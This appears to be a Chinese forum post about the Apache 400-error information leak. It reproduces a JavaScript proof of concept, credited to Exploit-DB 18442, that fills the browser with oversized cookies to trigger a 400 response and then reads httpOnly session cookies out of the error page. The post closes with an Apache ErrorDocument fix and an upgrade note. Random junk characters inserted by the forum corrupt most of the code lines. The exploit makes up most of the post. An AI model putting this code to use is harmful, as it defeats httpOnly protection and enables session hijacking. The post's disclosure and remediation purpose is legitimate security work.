很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。2 `$ r: k9 {/ ^ M
% b# r: y2 x* X/ ]
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:8 ?' F+ Z9 D8 A1 }
W" o4 s% [7 R# t. O" c& Q- Y
/ @/ [4 ` Q. |) R, i/ ~// http://www.exploit-db.com/exploits/18442/
0 h! X! @( q5 nfunction setCookies (good) {+ n5 J9 ]% @6 q" K/ A% f4 D# ?1 P
// Construct string for cookie value
7 X# f) Y1 c! K) U' b$ Xvar str = "";' i3 o/ H& l( I0 L" h$ O
for (var i=0; i< 819; i++) {
% X; C0 u8 G7 q5 d8 Bstr += "x";
+ V4 [4 |! O3 {" k$ V' C4 t) F9 @$ ^}
! g: |, e. O2 @4 t) t! M2 y// Set cookies
+ I- M7 i1 v9 @& d# g! ofor (i = 0; i < 10; i++) {
6 W" W1 I, n: G6 o# E// Expire evil cookie- {7 Y. L z: g9 ~
if (good) {
& h& k' m5 u5 @5 d# o' E+ O8 }var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
2 ~' i9 ?6 f' L7 r6 t}
- E; ~' N/ ` y& {9 ]$ V% W// Set evil cookie
8 x5 L9 m4 V+ K+ Felse {9 D: O" Z# }& w0 B& c, [# D
var cookie = "xss"+i+"="+str+";path=/";6 [/ V8 a' }6 _- c$ N
}% c s: ^; y+ W$ p; d) ?
document.cookie = cookie;
) D4 e. w- @3 C2 v' j; w' {* B$ m}
; g! p2 b9 e! G}) U, K0 H" W& U) [% }" r
function makeRequest() {; a$ r- ?5 h! w2 m2 P0 t
setCookies();' r' p( f) D/ E2 y
function parseCookies () {
2 f9 I" b9 @& D+ f" T( }var cookie_dict = {};/ i! ]6 e( C. w* }# K
// Only react on 400 status9 O0 _9 j l3 {% O9 q& x( A
if (xhr.readyState === 4 && xhr.status === 400) {3 r: T' Z8 C5 }4 `
// Replace newlines and match <pre> content% r* D# c9 E# r9 V# c% l
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
/ }9 Z" T( r) Z$ j4 Kif (content.length) {: w3 \. m+ h, Z% V% [9 U
// Remove Cookie: prefix
3 b8 ?+ l5 k) K% K2 ]6 t- \content = content[1].replace("Cookie: ", "");3 X" x# {+ I/ W) n; J' ^
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);: p# c! c% l$ T7 F8 k
// Add cookies to object' M' ?5 X5 y0 C) Q3 \
for (var i=0; i<cookies.length; i++) {
9 b9 {& M+ z" {8 V+ F, n1 cvar s_c = cookies.split('=',2);0 i+ S" I/ m% p) m* G N' [1 L
cookie_dict[s_c[0]] = s_c[1];- E! z/ r+ m; ?
}. |# ]6 k: K3 v) T& G8 Q
}
' I) K1 X% g0 R, R5 J// Unset malicious cookies, b9 d' Y! U. _( J* R l3 X+ f- E9 V
setCookies(true);* l, q' s6 P: `* t. j
alert(JSON.stringify(cookie_dict));. x$ |8 ^. x/ a# W! j% b7 W' |
}
3 v9 I( x0 I3 Z* D& E' X7 ^}
8 U ~$ A; ~3 |// Make XHR request* i* D' N$ {, e, `5 t/ u2 o
var xhr = new XMLHttpRequest();
* ~( j! i( J; A. q! i/ u* gxhr.onreadystatechange = parseCookies;
5 Z4 A, N9 `) Y( @0 r; J: ? o) Pxhr.open("GET", "/", true);) c& u3 o( z1 H8 i( S. H( R% }# \
xhr.send(null);. w [- y6 x& @* l2 I
}+ U9 A8 ~2 o3 T" b/ X9 S
makeRequest();- G% c, g' D4 j
/ s' e2 q4 g* k" v# a; f你就能看见华丽丽的400错误包含着cookie信息。
- x; j- t) @# L* Q( o( |
0 `/ [) m- ~8 q5 D7 f5 O下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
0 e3 c2 ~/ w4 [! v
$ P, a( q3 G5 {修复方案:# c: b4 l4 }; X: u6 P4 A6 G4 N
" I6 y: P7 J R/ r3 }( KApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
7 t* `% h5 y$ `3 z2 f( r& e& c' M7 t a1 P/ q/ o' y
In the event of a problem or error, Apachecan be configured to do one of four things,
$ D' z: a/ P" W) ~3 a6 ^3 U6 W6 j. i; I& R! t1 R |0 q. a
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息# F, D( z' W" D+ s) E* k1 H' E0 l
2. output acustomized message输出一段信息
/ J! e/ F4 q% t& o3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
$ j$ O$ I: j# W, b4. redirect to an external URL to handle theproblem/error转向一个外部URL4 i) W! P8 D, x3 f" V0 `, G& X4 i
; |8 l/ u4 Y$ S% d9 s2 q
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
4 Q8 H1 X: L+ v- y9 d2 F+ k
, s/ j# Z1 w5 t, z" F+ |/ u1 g! ?Apache配置:
1 |8 l' i( N, E( d
" h* U \) O8 j- t2 mErrorDocument400 " security test"
8 u Y. B- y$ A+ l# U+ G7 T
" S7 l' g0 |! r, x当然,升级apache到最新也可:)。
+ @4 z$ z, t3 C8 j8 |8 U! D1 J F3 _4 a; z @
参考:http://httpd.apache.org/security/vulnerabilities_22.html; Q' O; X6 i& U( ]* U" [
3 c" s& d& V8 T8 t* G
|
发表于 2013-4-19 19:15:43
收藏
支持
反对